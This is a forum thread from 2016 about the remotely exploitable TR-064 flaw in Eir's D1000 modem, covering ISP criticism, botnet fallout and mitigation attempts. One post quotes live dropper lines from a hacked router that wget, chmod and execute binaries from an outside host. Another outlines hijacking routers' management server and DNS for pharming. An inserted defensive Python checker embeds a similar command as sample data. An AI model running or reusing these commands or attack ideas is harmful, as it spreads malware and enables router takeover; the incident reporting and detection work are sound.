
Eir home router vulnerability.

  • 22-11-2016 10:41am
    #1
    Registered Users Posts: 246 ✭✭


    Looks like Eir have made a dog's dinner of the security on their D1000 modem.

    http://www.theregister.co.uk/2016/11/22/eir_customers_modems_vulnerable/
    The ZyXEL-built Eir D1000 comes with an open TCP port, 7547, which is used by the CPE WAN Management Protocol to manage the modems on Eir's network.
    "By sending certain TR-064 commands, we can instruct the modem to open port 80 on the firewall," kenzo's post says. "This allows access to the web administration interface from the Internet-facing side of the modem. The default login password for the D1000 is the Wi-Fi password. This is easily obtained with another TR-064 command."

    The Register seem to be the only source at the moment, Eir have declined to comment.

    Sleep soundly :)


Comments

  • Registered Users Posts: 6,392 ✭✭✭AnCatDubh


    I recall something about another Eir(com) router - DSL grade (can't recall which model), which on the admin login page had the admin password embedded as a comment in the HTML(!!). I came across it on these forums and verified myself that this was the case as I had the same router. Though now I am no longer an Eir(com) customer (not specifically for that reason though).

    EDIT: Here's that thread that I was referring to. http://www.boards.ie/vbulletin/showthread.php?p=93275394


  • Registered Users Posts: 972 ✭✭✭_Puma_


    Heads should roll for this. I've started a thread in the Talk to Eir section of boards.

    "Back in the days when Eir were Eircom and they used Netopia modems, port 7547 was blocked to every IP address except those assigned to Eir’s management servers. This meant even though the Netopia modems had bugs, they could not be exploited. Inexplicably, Eir do not do this for their newer modems. If they did, these bugs would not have been exploitable".


  • Posts: 11,614 ✭✭✭✭ [Deleted User]


    I saw this talk at DefCon 2 years ago and it described a different albeit similar protocol and pretty much the same vulnerability.



  • Registered Users Posts: 126 ✭✭infodox


    Trivially exploitable remotely. Exploit Code/Screenshot
    You can do the config dumping and changing on Vodafone (Ireland), TalkTalk (UK), Plusnet (UK), Demon (UK), Post Office Broadband (UK) ones as well. Have yet to test it on the ZyXEL's that Zen Internet (UK) ship. So far the remote command injection has only worked in tests I was able to perform on Eir ones.


  • Registered Users Posts: 246 ✭✭Alcoheda


    That's shocking. Do you think these routers are being attacked in the wild?
    I mean I could probably write a botnet with that information and I know basically nothing.


  • Registered Users Posts: 126 ✭✭infodox


    They probably are being actively exploited (probably at a small scale) by now.
    More interestingly, while reading the TR-064 spec I noticed there is a config value you can set to change the ACS management server to one of your choice, lol.
    So instead of dropping malware on them in the "usual fashion", you could just set up your own ACS server (there are F/OSS packages out there for this) and mass-change the settings so they are now "managed" by you instead of the ISP.
    You could also engage in widespread "pharming" by remotely updating the DNS servers they use to ones under your control, and then proceed to redirect users to phishing pages instead of legitimate sites. This has been done before by exploiting CSRF bugs in routers and broken authentication issues.


  • Registered Users Posts: 1,091 ✭✭✭KAGY


    This might be currently exploited. I noticed that my NTP server field was set to run a line of script rather than an IP address.
    something like change to tmp wget from l.ocal.host (extra dot included) and change perms to 777


  • Registered Users Posts: 106 ✭✭jgorres


    Here is a comment from the (German) Heise Forum, mentioning a majority of those attacks coming from EIRCOM.

    Here is the article about the D1000 vulnerability.
    --
    For security reasons this reply was encrypted twice using ROT13.


  • Registered Users Posts: 1,091 ✭✭✭KAGY


    OK, my D1000 is definitely hacked. NTP server IP is a wget to this file/script
    cd /var/tmp;cd /tmp;wget http://binpt.pw/1;chmod 777 1;busybox chmod 777 1;./1;rm -f ./*
    cd /var/tmp;cd /tmp;wget http://binpt.pw/2;chmod 777 2;busybox chmod 777 2;./2;rm -f ./*
    cd /var/tmp;cd /tmp;wget http://binpt.pw/3;chmod 777 3;busybox chmod 777 3;./3;rm -f ./*
    cd /var/tmp;cd /tmp;wget http://binpt.pw/4;chmod 777 4;busybox chmod 777 4;./4;rm -f ./*
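
A defensive check for the symptom reported in the post above, as an added example that is not part of the original thread: it flags any NTP server setting that is not a plain hostname or IP address, and lists the chained commands and download URLs for incident notes. The field names and the download host are constructed placeholders.

```python
import ipaddress
import re

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
# Shell syntax (';', '/', spaces, backticks) can never match this pattern.
HOSTNAME_RE = re.compile(r"^(?=.{1,253}$)([A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
                         r"[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")
URL_RE = re.compile(r"https?://[^\s;'\"`|&]+")


def is_valid_ntp_server(value):
    """True only for a bare IP address or an RFC 1123 style hostname."""
    value = value.strip()
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(value))


def audit_config(config):
    """Return one finding per NTP server field that is not a plain host."""
    findings = []
    for key, value in config.items():
        if "ntp" not in key.lower() or not value or is_valid_ntp_server(value):
            continue
        findings.append({
            "field": key,
            "commands": [c.strip() for c in value.split(";") if c.strip()],
            "urls": URL_RE.findall(value),
        })
    return findings


# Constructed sample: hypothetical field names, placeholder download host.
SAMPLE_CONFIG = {
    "NTPServer1": "cd /var/tmp;cd /tmp;wget http://dropper.example.invalid/1;"
                  "chmod 777 1;busybox chmod 777 1;./1;rm -f ./*",
    "NTPServer2": "pool.ntp.org",
    "NTPServer3": "192.0.2.10",
    "NTPServer4": "",
    "WiFiSSID": "home; network",
}

if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print(f["field"], "is not a hostname/IP;", len(f["commands"]), "commands")
        for url in f["urls"]:
            print("  fetches:", url)
```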


  • Registered Users Posts: 106 ✭✭jgorres


    Welcome to the wonderful and weird world of bot nets.
    --
    In a perfect world spammers would get caught, go to jail, and share a cell with many men who have enlarged their penises, taken Viagra and are looking for a new relationship.


  • Registered Users Posts: 1,091 ✭✭✭KAGY


    Does anyone know how I can stop this while I research a new router? I've performed a full factory reset, installed a clean ROM from eir and changed the default ports on the remote management tab. But it keeps getting hacked.

    Tonight's efforts included making /tmp read only and killing the tr069 process, so we wait and see.

    BTW I'm now with Vodafone so I'm not sure if I'll get any fix from eir

    Recommendations for router that can run open WRT or similar also appreciated :-)


  • Registered Users Posts: 106 ✭✭jgorres


    Wow,

    Most probably you are the only one on the whole EIR network, trying to get rid of the problem.

    I am with DigiWeb (using EIR's backbone) on a standard DSL line.

    Finally, DigiWeb blocked the relevant port from being reachable from the whole world. At the beginning of the attack the port was accessible. According to your post, EIR leaves their customers at risk, allowing access for the world to those ports through their network on to the customers' routers.

    I prefer BuffaloTech Airstations for setup with OpenWRT. I do not know which current models are compatible, just check the TOH.

    BuffaloTech also sells Airstations with pre-installed DD-WRT, if that suits you.

    Regards,
    Jörn.


  • Registered Users Posts: 126 ✭✭infodox


    Finally published my writeup on the issue along with lengthy lists of impacted devices/vendors, and possible ways the issue could be exploited.
    Probably will add more later - still reversing the malware itself that is being installed on the devices.


  • Registered Users Posts: 1,987 ✭✭✭Ziycon




  • Registered Users Posts: 106 ✭✭jgorres


    Interesting is
    • here, on boards.ie, up to now 16 messages in this thread
    versus
    • 352 messages (05.12.16, 21:00) on heise.de, where they discussed the results of this attack on the German Telekom network
    What did we learn from these figures?

    <sarcasm>The impact here in Ireland was not strong enough, i.e. Facebook, Twitter and WhatsApp were not slow enough for people to complain.</sarcasm>


  • Registered Users Posts: 6,126 ✭✭✭TheRiverman


    The ZyXel modems are rubbish compared to the Netopia model that was used some years ago.


  • Registered Users Posts: 68,502 ✭✭✭✭L1011


    jgorres wrote: »
    What did we learn from these figures?

    <sarcasm>The impact here in Ireland was not strong enough, i.e. Facebook, Twitter and WhatsApp were not slow enough for people to complain.</sarcasm>

    I'd take a stab that it's more that technically minded people are more likely to have VDSL or cable than in Germany, where lower speed DSL rules the roost. And it's a smaller country.


  • Registered Users Posts: 106 ✭✭jgorres


    One point is that the vast majority of users aren't geeks. They simply want (and need) a box, which they plug into the socket the telco technician installed. Plug and play.

    The telcos deliver those boxes. Their approach is mainly based on the costs for those boxes, i.e. they need to be cheap. They take a crappy box, put some modified crippleware on it (company logo on admin interface is very important) and give them to their customers. Fire and forget.

    The point on the figures is not the absolute number. Over in Germany even the number of about 900,000 affected Telekom users (which from an Irish point of view is large) represents only a small portion of the overall Telekom broadband customers (13 million, reference for this figure). Just 7 % of affected routers in the Telekom network made it coughing and rattling.

    And, according to EIR, just 1,800 routers were infected, but this small number caused those massive problems elsewhere (this is simplified, as not only EIRCOM is to blame and the Telekom routers have not been infected by the attack, but simply stopped working for another reason).

    I do not wish to fall back into history, where viruses were distributed via floppy disks and when you were king, when you had a 14,400 baud modem. However, it is a bit strange when one has to check the firewall because he changed a light bulb.

    At some point the so-called "smart" internet combined with the current security attitude will cause massive problems.


  • Registered Users Posts: 1,987 ✭✭✭Ziycon


    I truly wonder who these companies hire sometimes!
    Speaking on RTÉ’s Morning Ireland, Eir’s director of communications Paul Bradley said that the company became aware of a potential security vulnerability after details surrounding the risks were posted on the internet.

    "It came to light because there was a post online," he said.

    http://www.thejournal.ie/eir-modem-hack-3122232-Dec2016/


  • Registered Users Posts: 106 ✭✭jgorres


    Ziycon wrote: »
    I truly wonder who these companies hire sometimes!
    "It came to light because there was a post online," he said. http://www.thejournal.ie/eir-modem-hack-3122232-Dec2016/
    At least, they are not illiterate!


  • Closed Accounts Posts: 4,456 ✭✭✭The high horse brigade


    Ziycon wrote: »
    I truly wonder who these companies hire sometimes!



    http://www.thejournal.ie/eir-modem-hack-3122232-Dec2016/

    The person who found the vulnerability posted it online, nothing strange here


  • Registered Users Posts: 1,091 ✭✭✭KAGY


    KAGY wrote: »
    Tonight's efforts included making /tmp read only and killing the tr069 process, so we wait and see.
    One of these seemed to work, until I next reboot anyway. Of course it could be Vodafone blocking the port.

